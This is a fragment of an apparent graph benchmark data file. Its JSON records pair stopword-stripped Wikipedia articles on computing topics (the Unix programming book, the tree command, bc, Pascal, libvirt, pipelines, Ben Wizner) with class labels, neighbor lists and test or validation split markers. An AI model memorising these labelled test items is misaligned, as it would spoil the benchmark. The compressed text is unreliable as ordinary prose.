    "text": "Advanced_Programming_in_the_Unix_Environment:advanced programming unix environment advanced programming unix environment computer programming book w. richard stevens describing application programming interface unix family operating systems book illustrates unix application programming c programming language first edition book published addison-wesley 1992 covered programming two popular families unix operating system berkeley software distribution particular 4.3 bsd 386bsd unix system v particularly svr4 book covers system calls operations single file descriptors special calls like ioctl operate file descriptors operations files directories covers stdio section c standard library parts library needed several chapters concern apis control processes process groups daemons inter-process communication signals one chapter devoted unix terminal control another pseudo terminal concept libraries like termcap curses build atop stevens adds three chapters giving concrete examples unix programming implements database library communicates postscript printer modem book cover network programming subject stevens 1990 book unix network programming subsequent three-volume tcp/ip illustrated stevens died 1999 leaving second edition incomplete increasing popularity technical diversification unix derivatives largely compatible systems like linux environment code coverage stevens original became increasingly outdated working stevens unfinished notes stephen a. rago completed second edition addison-wesley published 2005 added support freebsd linux sun solaris apple darwin added coverage multithreaded programming posix threads second edition features foreword dennis ritchie unix-themed dilbert strip scott adams book widely lauded well written well crafted comprehensive received hearty recommendation linux journal review osnews describes one best tech books ever published review second edition",
    "neighbors": [
      4320,
      98,
      6813,
      4423,
      9067,
      7983,
      592,
      2995,
      8628,
      823,
      2045,
      9151
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8517,
    "label": 6,
    "text": "Tree_(command):tree command computing codice_1 recursive directory listing command program produces depth-indented listing files available unix unix-like systems well dos digital research flexos ibm/toshiba 4690 os pts-dos freedos ibm os/2 microsoft windows reactos arguments codice_1 lists files current directory directory arguments given codice_1 lists files directories found given directories turn upon completion listing files directories found codice_1 returns total number files directories listed options change characters used output use color output command available ms-dos versions 3.2 later ibm pc dos releases 2 later dr dos 6.0 includes implementation command tree unix utility developed steve baker freedos version developed dave dunfield reactos version developed asif bahrainwala three implementations licensed gpl",
    "neighbors": [
      3970,
      515,
      6148,
      8834,
      9733,
      9735,
      2568,
      3976,
      6281,
      6921,
      8713,
      6797,
      4750,
      10631,
      3856,
      6674,
      5397,
      2198,
      4248,
      8729,
      6812,
      4001,
      4771,
      292,
      7847,
      808,
      4398,
      7983,
      7088,
      10033,
      178,
      9780,
      823,
      1336,
      1978,
      7356,
      5437,
      7486,
      10428,
      960,
      3522,
      965,
      8522,
      3659,
      1741,
      4174,
      9166,
      10068,
      1750,
      9946,
      5603,
      5220,
      10727,
      6120,
      6506,
      9709,
      1647,
      9839,
      2545,
      4850,
      7411,
      5492,
      8692,
      9204,
      11249,
      6138,
      3323,
      6396,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 8518,
    "label": 1,
    "text": "Database_audit:database audit database auditing involves observing database aware actions database users database administrators consultants often set auditing security purposes example ensure without permission access information access",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      72,
      853,
      2901,
      9942,
      9177,
      8666,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8519,
    "label": 4,
    "text": "Ben_Wizner:ben wizner ben wizner born 1971 american lawyer writer civil liberties advocate american civil liberties union since july 2013 lead attorney nsa whistleblower edward snowden wizner born 1971 new connecticut grew campus yale university father stephen wizner professor law yale law school mother dean described drawn social justice work least early high school graduating harvard college 1993 worked organization provided legal assistance homeless near-homeless people new york university school law planned work legal services impoverished communities capital punishment cases graduating clerked judge stephen reinhardt united states court appeals ninth circuit wizner began working american civil liberties union los angeles august 2001 initially focusing prison reform following september 11 attacks wizner focus shifted civil liberties issues relating u.s. national security around 2004 moved aclu headquarters new york city argued legal cases relating airport security government watchlists surveillance practices targeted killing extraordinary rendition torture made several trips guantanamo bay detention camp many cases wizner took dismissed later commented worst days believed ... n't litigation traditional sense n't trying get court something creating record ... people would able look back decide whether right decision disastrous decision starting 2005 wizner represented khalid el-masri german citizen arrested travelling macedonia suspicion links al qaeda held cia black site afghanistan five months despite evidence wrong person el-masri suit dismissed u.s. grounds state secrecy though cia ultimately admitted making mistake report released u.s. senate european court human rights ruled macedonia case 2011 wizner became director aclu speech privacy technology project wizner adjunct professor new york university school law contributor website lawfare written time freedom press foundation several media outlets testified u.s. congress regularly appeared television news analysis programs including democracy meet press politicking larry king 2013 edward snowden contacted journalist glenn greenwald filmmaker laura poitras longtime acquaintances wizner releasing classified information nsa programs poitras consulted wizner travelling meet snowden hong kong greenwald later put wizner contact snowden july 2013 snowden stranded transit zone moscow passport revoked u.s. government wizner snowden exchanged encrypted communications time snowden legal team also includes jesselyn radack advocate whistleblowers wolfgang kaleck european attorney attorneys expertise criminal asylum law team works pro bono ensure snowden continued freedom ability contribute public conversation began disclosures wizner describes gatekeeper media requests snowden said believes snowden return u.s. eventually wizner called snowden case work lifetime traditional legal work means previously spent decade trying bring cases u.s. intelligence agencies cases often dismissed lack standing snowden revelations verizon delivering metadata u.s. government aclu standing sue wizner defended right privacy critical use extensive surveillance enforce law highlighted role lawbreaking positive social change pointing lgbt civil rights movement drug prohibition areas illegal activities contributed positive changes law public opinion speaking u.s. intelligence apparatus said nsa uniquely evil uniquely capable wizner forcefully defended snowden calls punishment stating broke law public good noting elected officials held criminally liable torture human rights violations since 9/11 following april 2019 arrest wikileaks founder julian assange london ecuadorian embassy ben wizner said authorities prosecute assange violating u.s. secrecy laws would set especially dangerous precedent u.s. journalists routinely violate foreign secrecy laws deliver information vital public interest",
    "neighbors": [
      7887,
      8134,
      3495
    ],
    "mask": "Test"
  },
  {
    "node_id": 8520,
    "label": 2,
    "text": "Libvirt:libvirt libvirt open-source api daemon management tool managing platform virtualization used manage kvm xen vmware esxi qemu virtualization technologies apis widely used orchestration layer hypervisors development cloud-based solution libvirt c library bindings languages notably python perl ocaml ruby java javascript via node.js php libvirt programming languages composed wrappers around another class/package called libvirtmod libvirtmod implementation closely associated counterpart c/c++ syntax functionality various virtualization programs platforms use libvirt virtual machine manager others provide graphical interfaces popular command line interface virsh higher level tools ovirt gnome boxes uses libvirt development libvirt backed red hat significant contributions organisations individuals libvirt available linux distributions remote servers also accessible apple microsoft windows clients",
    "neighbors": [
      1539,
      526,
      10265,
      9245,
      5662,
      5666,
      9766,
      39,
      5677,
      3121,
      5681,
      10820,
      11332,
      3654,
      4683,
      590,
      1102,
      7248,
      5202,
      4194,
      5732,
      4729,
      2170,
      4734,
      7812,
      4236,
      6797,
      10893,
      2723,
      2212,
      6307,
      2217,
      9906,
      7352,
      4289,
      3269,
      6367,
      2795,
      9455,
      2804,
      8439,
      253,
      8446,
      8451,
      272,
      2328,
      4377,
      8986,
      11038,
      295,
      6444,
      7983,
      8495,
      823,
      318,
      11070,
      8515,
      8520,
      4429,
      7512,
      2910,
      3428,
      8554,
      10090,
      8044,
      11646,
      11135,
      6018,
      3462,
      8582,
      6027,
      911,
      1935,
      8592,
      405,
      9655,
      10681,
      448,
      11201,
      8644,
      9682,
      467,
      10200,
      6618,
      6625,
      6632,
      1001,
      7660,
      2045,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 8521,
    "label": 2,
    "text": "Bondwell-2:bondwell-2 bondwell-2 early laptop personal computer running cp/m operating system introduced bondwell 1985 came zilog z80 cpu clocked 4 mhz 64 kb ram 4 kb rom 3.5 floppy disk drive highly unusual cp/m system os largely outmoded time 3.5 drives introduced model 2 main attraction price 995 usd also included micropro complete line cp/m software including wordstar also unusually cp/m system bondwell-2 capable displaying bitmapped graphics flip-up lcd display resolution 640x200 pixels 80x25 text characters 300 baud modem available option",
    "neighbors": [
      1776,
      1121,
      7983,
      4409
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8522,
    "label": 9,
    "text": "Bc_(programming_language):bc programming language bc basic calculator often referred bench calculator arbitrary-precision calculator language syntax similar c programming language bc typically used either mathematical scripting language interactive mathematical shell typical interactive usage typing command codice_1 unix command prompt entering mathematical expression whereupon output bc work arbitrary precision actually defaults zero digits decimal point expression yields surprise new bc users unaware fact option bc sets default scale digits decimal point 20 adds several additional mathematical functions language bc first appeared version 6 unix 1975 written robert morris lorinda cherry bell labs bc preceded dc earlier arbitrary-precision calculator written authors dc could arbitrary-precision calculations reverse polish notation rpn syntax inconvenient users therefore bc written front-end dc bc simple compiler single yacc source file hundred lines converted new c-like bc syntax dc postfix notation piped results dc 1991 posix rigorously defined standardized bc two implementations standard survive today first traditional unix implementation front-end dc survives unix plan 9 systems second free software gnu bc first released 1991 philip a. nelson gnu implementation numerous extensions beyond posix standard longer front-end dc bytecode interpreter posix standardized bc language traditionally written program dc programming language provide higher level access features dc language without complexities dc terse syntax form bc language contains single-letter variable array function names standard arithmetic operators well familiar control-flow constructs codice_2 codice_3 codice_4 c. unlike c codice_5 clause may followed codice_6 functions defined using codice_7 keyword values returned using codice_8 followed return value parentheses codice_9 keyword optional c used declare variable local function numbers variable contents arbitrary-precision numbers whose precision decimal places determined global codice_10 variable numeric base input interactive mode output program constants may specified setting reserved codice_11 input base codice_12 output base variables output generated deliberately assigning result calculation variable comments may added bc code use c codice_13 codice_14 start end comment symbols following posix bc operators behave exactly like c counterparts modulus operators codice_15 codice_16 behave exactly like c counterparts global codice_10 variable set 0 i.e calculations integer-only otherwise computation done appropriate scale codice_18 defined codice_19 examples operators superficially resemble c bitwise exclusive-or operators fact bc integer exponentiation operators particular note use codice_20 operator negative numbers follow c operator precedence codice_21 gives answer 4 bc rather −4 bitwise boolean conditional operators available posix bc codice_22 function calculating square roots posix bc built-in mathematical function functions available external standard library codice_23 function determining precision codice_10 variable argument codice_25 function determining number significant decimal digits argument also built-in bc standard math library defined -l option contains functions calculating sine cosine arctangent natural logarithm exponential function two parameter bessel function j standard mathematical functions including inverse trigonometric functions constructed using see external links implementations many functions -l option changes scale 20 things modulo may work unexpectedly example writing codice_26 command codice_27 outputs 0 writing codice_28 codice_26 command codice_27 output 1 plan 9 bc identical posix bc additional codice_31 statement gnu bc derives posix standard includes many enhancements entirely separate dc-based implementations posix standard instead written c. nevertheless fully backwards compatible posix bc programs run unmodified gnu bc programs gnu bc variables arrays function names may contain one character operators included c notably codice_5 clause may followed codice_6 output achieved either deliberately assigning result calculation variable posix way using added codice_31 statement furthermore codice_35 statement allows interactive input number running calculation addition c-style comments codice_36 character cause everything next new-line ignored value last calculation always stored within additional built-in codice_37 variable following logical operators additional posix bc available use conditional statements within codice_5 statement note however still equivalent bitwise assignment operations functions available gnu bc inherited posix functions provided standard gnu distribution since bc codice_20 operator allows integer power right one first functions bc user might write power function floating-point exponent assume standard library included /* function return integer part x */ calculate pi using builtin arctangent function bc -lq scale=10000 4*a 1 atan 1 45 degrees pi/4 radians syntax bc similar c published numerical functions written c often translated bc quite easily immediately provides arbitrary precision bc example journal statistical software july 2004 volume 11 issue 5 george marsaglia published following c code cumulative normal distribution double phi double x necessary changes accommodate bc different syntax realizing constant 0.9189 ... actually log 2*pi /2 translated following gnu bc code define phi x bc used non-interactively input pipe useful inside shell scripts example contrast note bash shell performs integer arithmetic e.g one also use here-string idiom bash ksh csh",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      521,
      5256,
      6281,
      6664,
      4750,
      8975,
      11663,
      4369,
      10387,
      5397,
      2198,
      6812,
      7196,
      1952,
      3488,
      4001,
      6138,
      292,
      2599,
      7847,
      8236,
      4398,
      7983,
      8499,
      310,
      1336,
      8504,
      7356,
      451,
      1987,
      965,
      2245,
      8517,
      9542,
      5706,
      3659,
      7883,
      1741,
      10967,
      9946,
      8675,
      10727,
      6120,
      9578,
      491,
      8954,
      10732,
      11249,
      4850,
      5106,
      5492,
      8306,
      8692,
      9204,
      10484,
      506,
      2045,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 8523,
    "label": 3,
    "text": "Pipeline_(computing):pipeline computing computing pipeline also known data pipeline set data processing elements connected series output one element input next one elements pipeline often executed parallel time-sliced fashion amount buffer storage often inserted elements computer-related pipelines include operating systems may provide unix-like syntax string several program runs pipeline implement latter simple serial execution rather true pipelining — namely waiting program finish starting next one pipelining commonly used concept everyday life example assembly line car factory specific task — installing engine installing hood installing wheels — often done separate work station stations carry tasks parallel different car car one task performed moves next station variations time needed complete tasks accommodated buffering holding one cars space stations and/or stalling temporarily halting upstream stations next station becomes available suppose assembling one car requires three tasks take 20 10 15 minutes respectively three tasks performed single station factory would output one car every 45 minutes using pipeline three stations factory would output first car 45 minutes new one every 20 minutes example shows pipelining decrease latency total time one item go whole system however increase system throughput rate new items processed first one since throughput pipeline better slowest element designer try divide work resources among stages take time complete tasks car assembly example three tasks took 15 minutes instead 20 10 15 minutes latency would still 45 minutes new car would finished every 15 minutes instead 20 ideal circumstances processing elements synchronized take amount time process item received element released previous one single clock cycle way items flow pipeline constant speed like waves water channel wave pipelines synchronization buffering needed stages besides storage needed data items generally buffering pipeline stages necessary processing times irregular items may created destroyed along pipeline example graphics pipeline processes triangles rendered screen element checks visibility triangle may discard invisible may output two triangular pieces partly hidden buffering also needed accommodate irregularities rates application feeds items first stage consumes output last one buffer two stages may simply hardware register suitable synchronization signalling logic two stages stage stores data item register sends data available signal next stage b b used data responds data received signal stage halts waiting signal storing next data item register stage b halts waiting data available signal ready process next item stage provided yet processing times element variable whole pipeline may often stop waiting element previous ones consume items input buffers frequency pipeline stalls reduced providing space one item input buffer stage multiple-item buffer usually implemented first-in first-out queue upstream stage may still halted queue gets full frequency events decrease buffer slots provided queuing theory tell number buffer slots needed depending variability processing times desired performance stage takes may take much longer others sped designer provide two processing elements carry task parallel single input buffer single output buffer element finishes processing current data item delivers common output buffer takes next data item common input buffer concept non-linear dynamic pipeline exemplified shops banks two cashiers serving clients single waiting queue applications processing item stage may depend results effect processing previous item x later stage b pipeline case stage correctly process item item x cleared stage b situation occurs often instruction pipelines example suppose arithmetic instruction reads contents register supposed modified earlier instruction x let stage fetches instruction operands b stage writes result specified register stage tries process instruction instruction x reaches stage b register may still contain old value effect would incorrect order handle conflicts correctly pipeline must provided extra circuitry logic detects takes appropriate action strategies include pipelined system typically requires resources circuit elements processing units computer memory etc one executes one batch time stages share resources buffering additional synchronization logic may needed elements moreover transfer items separate processing elements may increase latency especially long pipelines additional complexity cost pipelining may considerable dependencies processing different items especially guess-and-backtrack strategy used handle indeed cost implementing strategy complex instruction sets motivated radical proposals simplify computer architecture risc vliw compilers also burdened task rearranging machine instructions improve performance instruction pipelines",
    "neighbors": [
      4098,
      7173,
      6663,
      9739,
      7699,
      2071,
      10781,
      10786,
      8231,
      7218,
      2623,
      2113,
      7234,
      2638,
      3159,
      2140,
      3680,
      4194,
      5223,
      8810,
      4205,
      8815,
      6774,
      8822,
      7802,
      7305,
      1677,
      7313,
      8851,
      10387,
      3226,
      6815,
      8863,
      2210,
      4773,
      5798,
      6821,
      682,
      7852,
      10924,
      9391,
      2226,
      11447,
      8890,
      4286,
      9932,
      3793,
      4308,
      2264,
      731,
      11487,
      4833,
      9964,
      1776,
      6909,
      8447,
      6926,
      785,
      3352,
      2850,
      6950,
      2345,
      8499,
      309,
      8501,
      5948,
      8508,
      4928,
      4417,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      1359,
      7505,
      2394,
      11618,
      11630,
      4465,
      3960,
      904,
      1952,
      10658,
      3493,
      9126,
      936,
      9132,
      4017,
      10675,
      1480,
      3534,
      8143,
      2008,
      9179,
      10205,
      5088,
      995,
      2536,
      7657,
      8684,
      1005,
      4078,
      4596,
      7670,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 8524,
    "label": 9,
    "text": "Pascal_(programming_language):pascal programming language pascal imperative procedural programming language designed niklaus wirth small efficient language intended encourage good programming practices using structured programming data structuring named honor french mathematician philosopher physicist blaise pascal pascal developed pattern algol 60 language wirth involved process improve language part algol x efforts proposed version known algol w. accepted algol x process bogged 1968 wirth decided abandon algol x process improve algol w releasing pascal 1970 pascal became successful 1970s notably burgeoning minicomputer market compilers also available many microcomputers field emerged late 1970s widely used teaching language university-level programming courses 1980s also used production settings writing commercial software period displaced c programming language late 1980s early 1990s unix-based systems became popular especially release c++ derivative known object pascal designed object-oriented programming developed 1985 used apple computer borland late 1980s later developed delphi microsoft windows platform extensions pascal concepts led languages modula-2 oberon much history computer language design 1960s traced algol 60 language algol developed 1950s explicit goal able clearly describe algorithms included number features structured programming remain common languages day shortly introduction 1962 wirth began working dissertation helmut weber euler programming language euler based algol syntax many concepts derivative primary goal add dynamic lists types allowing used roles similar lisp language published 1965 time number problems algol identified notably lack standardized string system group tasked maintaining language begun algol x process identify improvements calling submissions wirth tony hoare submitted conservative set modifications add strings clean syntax considered minor worth using new standard algol wirth wrote compiler language became known algol w. algol x efforts would go choose dramatically complex language algol 68 complexity language led considerable difficulty producing high-performance compilers widely used industry left opening newer languages pascal influenced algol w efforts explicit goals producing language would efficient compiler run-time allow development well-structured programs useful teaching students structured programming generation students used pascal introductory language undergraduate courses one early successes language introduction ucsd pascal version ran custom operating system could ported different platforms key platform apple ii saw widespread use led use pascal becoming primary high-level language used development apple lisa later macintosh parts original macintosh operating system hand-translated motorola 68000 assembly language pascal sources typesetting system tex donald e. knuth written web original literate programming system based dec pdp-10 pascal successful commercial applications like adobe photoshop written macintosh programmer workshop pascal applications like total commander skype macromedia captivate written delphi object pascal apollo computer used pascal systems programming language operating systems beginning 1980 variants pascal also used everything research projects pc games embedded systems newer pascal compilers exist widely used work lisa larry tesler began corresponding wirth idea adding object oriented extensions language led initially clascal introduced 1983 lisa program faded replaced mac version known object pascal created introduced macintosh 1985 part macapp application framework became apple primary development language early 1990s object pascal extensions added turbo pascal release version 5.5 1989 years object pascal became basis delphi system microsoft windows still used developing windows applications cross-compile code systems free pascal open source cross-platform alternative wirth intention create efficient language regarding compilation speed generated code based structured programming recently popularized concept promoted book algorithms data structures programs pascal roots algol 60 language also introduced concepts mechanisms top algol scalars arrays enabled programmers define complex structured datatypes also made easier build dynamic recursive data structures lists trees graphs important features included records enumerations subranges dynamically allocated variables associated pointers sets make possible meaningful pascal strong typing objects means one type data converted interpreted another without explicit conversions similar mechanisms standard many programming languages today languages influenced pascal development simula 67 wirth algol w. pascal like many programming languages today unlike languages c family allows nested procedure definitions level depth also allows kinds definitions declarations inside subroutines procedures functions enables simple coherent syntax complete program syntactically nearly identical single procedure function except heading one three keywords first pascal compiler designed zürich cdc 6000 series mainframe computer family niklaus wirth reports first attempt implement fortran 1969 unsuccessful due fortran inadequacy express complex data structures second attempt implemented c-like language scallop max engeli translated hand r. schild pascal boot-strapping operational mid-1970 many pascal compilers since similarly self-hosting compiler written pascal compiler usually capable recompiling new features added language compiler ported new environment gnu pascal compiler one notable exception written c. first successful port cdc pascal compiler another mainframe completed welsh quinn queen university belfast qub 1972 target icl 1900 series compiler turn parent pascal compiler information computer systems ics multum minicomputer multum port developed – view using pascal systems programming language – findlay cupples cavouras davis working department computing science glasgow university thought multum pascal completed summer 1973 may first 16-bit implementation completely new compiler completed welsh et al qub 1977 offered source-language diagnostic feature incorporating profiling tracing type-aware formatted postmortem dumps implemented findlay watt glasgow university implementation ported 1980 icl 2900 series team based southampton university glasgow university standard pascal model implementation also based compiler adapted welsh hay manchester university 1984 check rigorously conformity bsi 6192/iso 7185 standard generate code portable abstract machine first pascal compiler written north america constructed university illinois donald b. gillies pdp-11 generated native machine code propagate language rapidly compiler porting kit created zurich included compiler generated code virtual stack machine i.e code lends reasonably efficient interpretation along interpreter code – pascal-p system p-system compilers termed pascal-p1 pascal-p2 pascal-p3 pascal-p4 pascal-p1 first version pascal-p4 last come zurich version termed pascal-p1 coined fact many different sources pascal-p existed compiler redesigned enhance portability issued pascal-p2 code later enhanced become pascal-p3 intermediate code backward compatible pascal-p2 pascal-p4 backward compatible pascal-p4 compiler/interpreter still run compiled systems compatible original pascal however accepts subset pascal language pascal-p5 created outside zurich group accepts full pascal language includes iso 7185 compatibility ucsd pascal branched pascal-p2 kenneth bowles utilized create interpretive ucsd p-system ucsd p-system one three operating systems available launch original ibm personal computer ucsd pascal used intermediate code based byte values thus one earliest byte code compilers pascal-p1 pascal-p4 rather based cdc 6600 60 bit word length compiler based pascal-p4 compiler created native binaries released ibm system/370 mainframe computer australian atomic energy commission called aaec pascal compiler abbreviation name commission apple computer created lisa pascal lisa workshop 1982 ported compiler apple macintosh mpw 1985 1985 larry tesler consultation niklaus wirth defined object pascal extensions incorporated lisa pascal mac pascal compilers 1980s anders hejlsberg wrote blue label pascal compiler nascom-2 reimplementation compiler ibm pc marketed names compas pascal polypascal acquired borland renamed turbo pascal turbo pascal became hugely popular thanks aggressive pricing strategy one first full-screen ides fast turnaround time seconds compile link run written highly optimized entirely assembly language making smaller faster much competition 1986 anders ported turbo pascal macintosh incorporated apple object pascal extensions turbo pascal extensions added back pc version turbo pascal version 5.5 time microsoft also implemented object pascal compiler turbo pascal 5.5 large influence pascal community began concentrating mainly ibm pc late 1980s many pc hobbyists search structured replacement basic used product also began adopted professional developers around time number concepts imported c let pascal programmers use c-based api microsoft windows directly extensions included null-terminated strings pointer arithmetic function pointers address-of operator unsafe typecasts turbo pascal derivatives units module concepts modular languages however provide nested module concept qualified import export specific symbols super pascal variant added non-numeric labels return statement expressions names types tmt pascal first borland-compatible compiler 32-bit dos protected mode os/2 win32 operating systems tmt pascal language first one allow function operator overloading universities wisconsin-madison zürich karlsruhe wuppertal developed pascal-sc pascal-xsc extensions scientific computation compilers aimed programming numerical computations development pascal-sc started 1978 supporting iso 7185 pascal level 0 level 2 support added later stage pascal-sc originally targeted z80 processor later rewritten dos x86 68000 pascal-xsc various times ported unix linux sunos hp-ux aix microsoft/ibm dos emx os/2 windows operating systems operates generating intermediate c source code compiled native executable pascal-sc language extensions adopted gnu pascal pascal sol designed around 1983 french team implement unix-like systems named sol standard pascal level-1 parametrized array bounds definition allowed alternative keywords predefined identifiers french language included extensions ease system programming e.g equivalent lseek sol team later moved chorusos project design distributed operating system ip pascal implementation pascal programming language using micropolis dos moved rapidly cp/m-80 running z80 moved 80386 machine types 1994 exists today windows/xp linux implementations 2008 system brought new level resulting language termed pascaline pascal calculator includes objects namespace controls dynamic arrays along many extensions generally features functionality type protection c implementation also compatible original pascal implementation standardized iso 7185 pascal original form purely procedural language includes traditional array algol-like control structures reserved words else case ranging single statement begin-end statements block pascal also data structuring constructs included original algol 60 types like records variants pointers enumerations sets procedure/pointers constructs part inherited inspired simula 67 algol 68 niklaus wirth algol w suggestions c. a. r. hoare pascal programs start program keyword list external file descriptors parameters ref name= iso/iec 7185:1990 6.10 pascal iso 7185:1990 6.10 /ref required turbo pascal etc follows main block bracketed begin end keywords semicolons separate statements full stop i.e. period ends whole program unit letter case ignored pascal source example source code use simple hello world program type pascal several popular programming languages defines variable way defines range values variable capable storing also defines set operations permissible performed variables type predefined types range values allowed except boolean implementation defined functions provided data conversions conversion codice_1 codice_2 following functions available codice_3 rounds integer using banker rounding codice_4 rounds towards zero programmer freedom define commonly used data types e.g byte string etc terms predefined types using pascal type declaration facility example subranges ordinal data type simple type except real also made contrast programming languages time pascal supports set type set fundamental concept modern mathematics may used many algorithms feature useful may faster equivalent construct language support sets example many pascal compilers executes faster sets non-contiguous values particularly useful terms performance readability examples involve sets small domains improved performance usually achieved compiler representing set variables bit vectors set operators implemented efficiently bitwise machine code operations types defined types using type declarations complex types constructed simple types shown example pascal files sequences components every file buffer variable denoted f^ procedures get reading put writing move buffer variable next element read introduced read f x x f^ get f write introduced write f x f^ x put f type text predefined file char buffer variable could used inspecting next character used check digit reading integer leads serious problems interactive programs early implementations solved later lazy i/o concept jensen wirth pascal strings represented packed arrays chars therefore fixed length usually space-padded pascal supports use pointers variable nodeptr pointer data type node record pointers used declared forward declaration exception rule things must declared used create new record assign value 10 character fields b record initialise pointer c null pointer nil pascal statements would could also done using statement follows inside scope statement b refer subfields record pointer nodeptr record node pointer type pnode linked lists stacks queues created including pointer type field c record unlike many languages feature pointers pascal allows pointers reference dynamically created variables anonymous allow reference standard static local variables pointers also must associated type pointer one type compatible pointer another type e.g pointer char compatible pointer integer helps eliminate type security issues inherent pointer implementations particularly used pl/i c. also removes risks caused dangling pointers ability dynamically deallocate referenced space using dispose function effect free library function found c means risk dangling pointers entirely eliminated languages java c provide automatic garbage collection entirely eliminate related problem memory leaks restrictions lifted newer dialects pascal structured programming language meaning flow control structured standard statements usually without 'goto commands pascal structures programs procedures functions procedures functions nested depth 'program construct logical outermost block default parameters passed value 'var precedes parameter name passed reference procedure function declarations goto labels constants types variables procedures functions must order ordering requirement originally intended allow efficient single-pass compilation however dialects embarcadero delphi strict ordering requirement declaration sections relaxed pascal adopted many language syntax features algol language including use semicolon statement separator contrast languages pl/i c etc use semicolon statement terminator semicolon needed end keyword record type declaration block case statement keyword repeat statement else keyword statement presence extra semicolon permitted early versions pascal however addition algol-like empty statements 1973 revised report later changes language iso 7185:1983 allow optional semicolons cases semicolon still permitted immediately else keyword statement else follows single statement statement sequence case nested ifs semicolon used avoid dangling else problem inner else outer putatively terminating nested semicolon – instead terminates clauses instead explicit codice_5 block must used several pascal compilers interpreters available general use 1983 language standardized international standard iec/iso 7185 several local country specific standards including american ansi/ieee770x3.97-1983 iso 7185:1983 two standards differed iso standard included level 1 extension conformant arrays array boundaries array known run time ansi allow extension original wirth version language 1989 iso 7185 revised iso 7185:1990 correct various errors ambiguities found original document iso 7185 stated clarification wirth 1974 language detailed user manual report jensen wirth also notable adding conformant array parameters level 1 standard level 0 pascal without conformant arrays addition made request c. a. r. hoare approval niklaus wirth precipitating cause hoare wanted create pascal version nag numerical algorithms library originally written fortran found possible without extension would allow array parameters varying size similar considerations motivated inclusion iso 7185 facility specify parameter types procedural functional parameters niklaus wirth referred 1974 language standard example differentiate machine specific features cdc 6000 compiler language documented pascal report second part pascal users manual report large machines mainframes minicomputers pascal originated standards generally followed ibm pc ibm pcs borland standards turbo pascal delphi greatest number users thus typically important understand whether particular implementation corresponds original pascal language borland dialect ibm pc versions language began differ advent ucsd pascal interpreted implementation featured several extensions language along several omissions changes many ucsd language features survive today including borland dialect 1990 extended pascal standard created iso/iec 10206 identical technical content ref name= iso/ansi identical /ref ieee/ansi 770x3.160-1989 2019 support extended pascal freepascal compiler planned niklaus wirth zurich version pascal issued outside eth two basic forms cdc 6000 compiler source porting kit called pascal-p system pascal-p compiler left several features full language required bootstrap compiler example procedures functions used parameters undiscriminated variant records packing dispose interprocedural gotos features full compiler omitted ucsd pascal professor kenneth bowles based pascal-p2 kit consequently shared several pascal-p language restrictions ucsd pascal later adopted apple pascal continued several versions although ucsd pascal actually expanded subset pascal pascal-p kit adding back standard pascal constructs still complete standard installation pascal early 1990s alan burns geoff davies developed pascal-fc extension pl/0 niklaus book 'algorithms+data structures=programs several constructs added use pascal-fc teaching tool concurrent programming semaphores monitors channels remote-invocation resources able demonstrate concurrency compiler output kind p-code could executed virtual machine virtual machine simulated normal – fair – environment could also simulate extreme conditions unfair mode borland turbo pascal written anders hejlsberg written assembly language independent ucsd zurich compilers however adopted much subset extensions ucsd compiler probably ucsd system common pascal system suitable developing applications resource-limited microprocessor systems available time shrink-wrapped turbo pascal version 3 later incarnations including borland object pascal delphi non-borland near-compatibles became popular programmers including shareware authors swag library pascal code features large amount code written versions delphi mind software products compilers ide/rapid application development rad category pascal generated wide variety responses computing community critical complimentary popular 1980s early 1990s implementations pascal closely followed wirth initial definition language widely criticized unsuitable use outside teaching brian kernighan popularized c language outlined notable criticisms pascal early 1981 article pascal favorite programming language serious problem described array sizes string lengths part type possible write function would accept variable-length arrays even strings parameters made unfeasible write example sorting library kernighan also criticized unpredictable order evaluation boolean expressions poor library support lack static variables raised number smaller issues also stated language provide simple constructs escape knowingly forcibly ignore restrictions limitations general complaints sources noted scope declarations clearly defined original language definition sometimes serious consequences using forward declarations define pointer types record declarations led mutual recursion identifier may may used enumeration list another difficulty like algol 60 language allow procedures functions passed parameters predefine expected type parameters kernighan criticisms directly addressed article pascal programming language bill catambay specifically myth 6 pascal serious programmers despite initial criticisms pascal continued evolve kernighan points apply versions language enhanced suitable commercial product development borland turbo pascal kernighan predicted article extensions fix issues incompatible compiler compiler since early 1990s however varieties seem condensed two categories iso borland-like extended pascal addresses many early criticisms supports variable-length strings variable initialization separate compilation short-circuit boolean operators default codice_6 clauses case statements",
    "neighbors": [
      512,
      10752,
      11269,
      1031,
      3594,
      6154,
      10764,
      2062,
      11279,
      6160,
      8720,
      4114,
      5651,
      3613,
      5149,
      5663,
      8221,
      9245,
      9759,
      547,
      10786,
      4137,
      2603,
      8235,
      45,
      5677,
      9264,
      5684,
      3126,
      1079,
      58,
      2619,
      3642,
      6718,
      576,
      8771,
      8262,
      8775,
      2120,
      585,
      1610,
      1611,
      4684,
      9290,
      6228,
      6742,
      3160,
      10841,
      7775,
      8289,
      2658,
      7269,
      6248,
      1130,
      8301,
      5743,
      8303,
      8304,
      9330,
      9848,
      1145,
      3705,
      5754,
      7292,
      9345,
      1666,
      2179,
      136,
      1672,
      1673,
      6797,
      10387,
      11411,
      11412,
      3734,
      5783,
      8854,
      155,
      6813,
      2206,
      7326,
      8866,
      8868,
      4265,
      4777,
      10413,
      3762,
      1203,
      692,
      5816,
      7355,
      7867,
      10430,
      6338,
      10435,
      10436,
      8904,
      5833,
      10953,
      6349,
      7889,
      213,
      4822,
      727,
      5336,
      217,
      219,
      3296,
      6369,
      226,
      228,
      1253,
      8421,
      10470,
      4840,
      5354,
      2283,
      4331,
      6378,
      2798,
      8426,
      9452,
      10478,
      10480,
      10991,
      4341,
      9981,
      1790,
      1278,
      256,
      2304,
      2303,
      6910,
      11010,
      1804,
      8973,
      2830,
      6414,
      8463,
      10510,
      5395,
      9491,
      1304,
      8474,
      11036,
      3358,
      5921,
      11555,
